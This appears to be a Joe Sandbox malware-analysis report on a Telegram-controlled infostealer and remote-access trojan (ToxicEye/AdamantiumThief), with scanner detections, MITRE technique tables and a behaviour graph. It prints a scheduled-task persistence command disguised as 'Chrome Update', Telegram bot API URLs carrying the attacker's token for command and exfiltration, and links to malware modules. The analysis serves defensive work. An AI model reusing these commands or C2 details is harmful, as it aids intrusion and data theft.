                                        Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
                                        Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                        Source: rat.exe, 0000000A.00000002.2170080908.0000023F1DB07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                                        Source: rat.exe.0.drBinary or memory string: VMwareVBox
                                        Source: dAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                        Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                        Source: C:\Users\ToxicEye\rat.exeProcess information queried: ProcessInformationJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess queried: DebugPortJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess queried: DebugPortJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeMemory allocated: page read and write | page guardJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exeJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.batJump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 2960" Jump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"Jump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /NobreakJump to behavior
                                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\ToxicEye\rat.exe "rat.exe" Jump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exeJump to behavior
                                        Source: dAIJ6g47mZ.exe, rat.exe.0.drBinary or memory string: Shell_TrayWnd)<

                                        Language, Device and Operating System Detection

                                        barindex
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeQueries volume information: C:\Users\user\Desktop\dAIJ6g47mZ.exe VolumeInformationJump to behavior
                                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeQueries volume information: C:\Users\ToxicEye\rat.exe VolumeInformationJump to behavior
                                        Source: C:\Users\ToxicEye\rat.exeQueries volume information: C:\Users\ToxicEye\rat.exe VolumeInformationJump to behavior
                                        Source: C:\Users\user\Desktop\dAIJ6g47mZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                        Lowering of HIPS / PFW / Operating System Security Settings

                                        barindex
                                        Source: dAIJ6g47mZ.exe, commands.cs.Net Code: handle
                                        Source: rat.exe.0.dr, commands.cs.Net Code: handle
                                        Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                        Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
                                        Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                        Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                        Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe

                                        Stealing of Sensitive Information

                                        barindex
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED

                                        Remote Access Functionality

                                        barindex
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Source: Yara matchFile source: dAIJ6g47mZ.exe, type: SAMPLE
                                        Source: Yara matchFile source: 0.0.dAIJ6g47mZ.exe.1f365bf0000.0.unpack, type: UNPACKEDPE
                                        Source: Yara matchFile source: 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                        Source: Yara matchFile source: Process Memory Space: dAIJ6g47mZ.exe PID: 2960, type: MEMORYSTR
                                        Source: Yara matchFile source: C:\Users\ToxicEye\rat.exe, type: DROPPED
                                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                                        Valid Accounts111
                                        Windows Management Instrumentation
                                        1
                                        Scheduled Task/Job
                                        12
                                        Process Injection
                                        111
                                        Masquerading
                                        1
                                        Input Capture
                                        331
                                        Security Software Discovery
                                        Remote Services1
                                        Input Capture
                                        Exfiltration Over Other Network Medium1
                                        Web Service
                                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                                        Default Accounts1
                                        Scheduled Task/Job
                                        Boot or Logon Initialization Scripts1
                                        Scheduled Task/Job
                                        11
                                        Disable or Modify Tools
                                        LSASS Memory3
                                        Process Discovery
                                        Remote Desktop Protocol11
                                        Archive Collected Data
                                        Exfiltration Over Bluetooth11
                                        Encrypted Channel
                                        SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                                        Domain Accounts1
                                        Scripting
                                        Logon Script (Windows)Logon Script (Windows)151
                                        Virtualization/Sandbox Evasion
                                        Security Account Manager151
                                        Virtualization/Sandbox Evasion
                                        SMB/Windows Admin Shares1
                                        Clipboard Data
                                        Automated Exfiltration1
                                        Ingress Tool Transfer
                                        Data Encrypted for ImpactDNS ServerEmail Addresses
                                        Local AccountsCronLogin HookLogin Hook12
                                        Process Injection
                                        NTDS1
                                        File and Directory Discovery
                                        Distributed Component Object ModelInput CaptureTraffic Duplication2
                                        Non-Application Layer Protocol
                                        Data DestructionVirtual Private ServerEmployee Names
                                        Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                        Deobfuscate/Decode Files or Information
                                        LSA Secrets23
                                        System Information Discovery
                                        SSHKeyloggingScheduled Transfer13
                                        Application Layer Protocol
                                        Data Encrypted for ImpactServerGather Victim Network Information
                                        Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                        Scripting
                                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                                        External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                        Obfuscated Files or Information
                                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                                        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                        Timestomp
                                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                                        Hide Legend

                                        Legend:

                                        • Process
                                        • Signature
                                        • Created File
                                        • DNS/IP Info
                                        • Is Dropped
                                        • Is Windows Process
                                        • Number of created Registry Values
                                        • Number of created Files
                                        • Visual Basic
                                        • Delphi
                                        • Java
                                        • .Net C# or VB.NET
                                        • C, C++ or other language
                                        • Is malicious
                                        • Internet
                                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1379470 Sample: dAIJ6g47mZ Startdate: 23/01/2024 Architecture: WINDOWS Score: 100 46 api.telegram.org 2->46 48 google.com 2->48 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 62 11 other signatures 2->62 10 dAIJ6g47mZ.exe 10 2->10         started        14 rat.exe 4 2->14         started        signatures3 60 Uses the Telegram API (likely for C&C communication) 46->60 process4 file5 44 C:\Users\ToxicEye\rat.exe, PE32 10->44 dropped 72 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->72 74 Protects its processes via BreakOnTermination flag 10->74 76 Drops PE files to the user root directory 10->76 78 Uses schtasks.exe or at.exe to add and modify task schedules 10->78 16 cmd.exe 1 10->16         started        18 schtasks.exe 1 10->18         started        20 conhost.exe 10->20         started        22 conhost.exe 14->22         started        signatures6 process7 process8 24 rat.exe 14 4 16->24         started        28 conhost.exe 16->28         started        30 tasklist.exe 1 16->30         started        34 2 other processes 16->34 32 conhost.exe 18->32         started        dnsIp9 50 api.telegram.org 149.154.167.220, 443, 49699 TELEGRAMRU United Kingdom 24->50 52 google.com 142.251.15.139 GOOGLEUS United States 24->52 64 Antivirus detection for dropped file 24->64 66 Multi AV Scanner detection for dropped file 24->66 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->68 70 2 other signatures 24->70 36 schtasks.exe 1 24->36         started        38 WerFault.exe 16 24->38         started        40 conhost.exe 24->40         started        signatures10 process11 process12 42 conhost.exe 36->42         started       

                                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                        windows-stand
                                        SourceDetectionScannerLabelLink
                                        dAIJ6g47mZ.exe96%ReversingLabsByteCode-MSIL.Infostealer.AdamantiumTheif
                                        dAIJ6g47mZ.exe77%VirustotalBrowse
                                        dAIJ6g47mZ.exe100%AviraHEUR/AGEN.1307065
                                        dAIJ6g47mZ.exe100%Joe Sandbox ML
                                        SourceDetectionScannerLabelLink
                                        C:\Users\ToxicEye\rat.exe100%AviraHEUR/AGEN.1307065
                                        C:\Users\ToxicEye\rat.exe100%Joe Sandbox ML
                                        C:\Users\ToxicEye\rat.exe96%ReversingLabsByteCode-MSIL.Infostealer.AdamantiumTheif
                                        C:\Users\ToxicEye\rat.exe77%VirustotalBrowse
                                        No Antivirus matches
                                        No Antivirus matches
                                        SourceDetectionScannerLabelLink
                                        https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe0%Avira URL Cloudsafe
                                        https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw100%Avira URL Cloudmalware
                                        https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip100%Avira URL Cloudmalware
                                        https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs100%Avira URL Cloudmalware
                                        https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl100%Avira URL Cloudmalware
                                        https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te100%Avira URL Cloudmalware
                                        https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe3%VirustotalBrowse
                                        https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip12%VirustotalBrowse
                                        https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl1%VirustotalBrowse
                                        https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw7%VirustotalBrowse
                                        https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs7%VirustotalBrowse
                                        NameIPActiveMaliciousAntivirus DetectionReputation
                                        google.com
                                        142.251.15.139
                                        truefalse
                                          high
                                          api.telegram.org
                                          149.154.167.220
                                          truefalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921false
                                              high
                                              https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=6193406921&text=%F0%9F%8D%80%20Bot%20connectedfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSwrat.exe.0.drfalse
                                                • 7%, Virustotal, Browse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://api.telegram.orgrat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botdAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                    high
                                                    https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendLocation?chat_id=6193dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                      high
                                                      https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dldAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsrat.exe.0.drfalse
                                                      • 7%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zipdAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                      • 12%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://ip-api.com/json/dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                        high
                                                        https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/senddAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                          high
                                                          https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                            high
                                                            https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exedAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                            • 3%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://upx.sf.netAmcache.hve.18.drfalse
                                                              high
                                                              https://api.mylnikov.org/geolocation/wifi?bssid=dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                                high
                                                                https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=61934rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCE4000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getUpdatesdAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                                    high
                                                                    https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TedAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://api.telegram.orgrat.exe, 0000000A.00000002.2170409712.0000023F1DD10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedAIJ6g47mZ.exe, 00000000.00000002.2072333627.000001F367981000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DBE9000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000C.00000002.2093053581.000001EF99EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.telegram.org/file/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                                          high
                                                                          https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessagerat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getFile?file_id=dAIJ6g47mZ.exe, rat.exe.0.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              149.154.167.220
                                                                              api.telegram.orgUnited Kingdom
                                                                              62041TELEGRAMRUfalse
                                                                              142.251.15.139
                                                                              google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              Joe Sandbox version:38.0.0 Ammolite
                                                                              Analysis ID:1379470
                                                                              Start date and time:2024-01-23 13:18:57 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 19s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:19
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Critical Process Termination
                                                                              Sample name:dAIJ6g47mZ.exe
                                                                              (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                              Original Sample Name:638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@23/13@7/2
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 93%
                                                                              • Number of executed functions: 8
                                                                              • Number of non-executed functions: 1
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              TimeTypeDescription
                                                                              13:19:44Task SchedulerRun new task: Chrome Update path: C:\Users\ToxicEye\rat.exe
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              149.154.167.220FATURA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                5qgMqpI3O3.exeGet hashmaliciousXClient StealerBrowse
                                                                                  VXl6IxOofO.exeGet hashmaliciousGurcu StealerBrowse
                                                                                    Order_No_131223AT_ZIRAAT_BANKASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      qgi.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        fDPrTCclm5.exeGet hashmaliciousDCRatBrowse
                                                                                          SecuriteInfo.com.Python.Agent-LZ.32136.12177.exeGet hashmaliciousUnknownBrowse
                                                                                            SecuriteInfo.com.Python.Agent-LZ.23397.22787.exeGet hashmaliciousUnknownBrowse
                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.12595.16422.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                SecuriteInfo.com.Win32.CrypterX-gen.23182.21250.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  api.telegram.orgFATURA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 149.154.167.220
                                                                                                  5qgMqpI3O3.exeGet hashmaliciousXClient StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  VXl6IxOofO.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Order_No_131223AT_ZIRAAT_BANKASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  qgi.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fDPrTCclm5.exeGet hashmaliciousDCRatBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Python.Agent-LZ.32136.12177.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Python.Agent-LZ.23397.22787.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Win32.TrojanX-gen.12595.16422.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.23182.21250.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  TELEGRAMRUChrome.apkGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.99
                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                                  • 149.154.167.99
                                                                                                  FATURA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  • 149.154.167.220
                                                                                                  toolspub1.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog StealerBrowse
                                                                                                  • 149.154.167.99
                                                                                                  BbTm8TrVqb.exeGet hashmaliciousLummaC, AsyncRAT, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog StealerBrowse
                                                                                                  • 149.154.167.99
                                                                                                  5qgMqpI3O3.exeGet hashmaliciousXClient StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  buildz.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                  • 149.154.167.99
                                                                                                  toolspub1.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                  • 149.154.167.99
                                                                                                  VXl6IxOofO.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Order_No_131223AT_ZIRAAT_BANKASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ein_77427742377427742.jsGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  in_77427742377427742.jsGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  file.exeGet hashmaliciousRedLineBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MACHINE_QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PO#SC00487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SecuriteInfo.com.Win32.InjectorX-gen.1897.1183.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  nVX7Zrz0.posh.ps1Get hashmaliciousPoshC2Browse
                                                                                                  • 149.154.167.220
                                                                                                  HBKMC_56376_E127-EXP-MCE-231127.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  SOA_Attached.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  No context
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.436425051284702
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:w6qUtTsTE5cj4Wa4ZuDEwzuiFUY4lO8/R:NqUsE5cjNaKBwzuiFUY4lO8
                                                                                                  MD5:6087A1F3EE0C24A82E3D69AB7CFD79C0
                                                                                                  SHA1:9FA2F7317242594E458F04B69F075EDB1B2E47EC
                                                                                                  SHA-256:BCBEFD785DD9BF2FF935461F684EF96847E2FD5F350CBB4261C794D35F80D21E
                                                                                                  SHA-512:A744B98CB04F1C2B55792FFE7ACE598B438C9CE89D3101F349AADC12DD6634B2A655D2881794EAC2F1D239678D005B0CEFF0F64222D18350D696EF556FCE2A1C
                                                                                                  Malicious:false
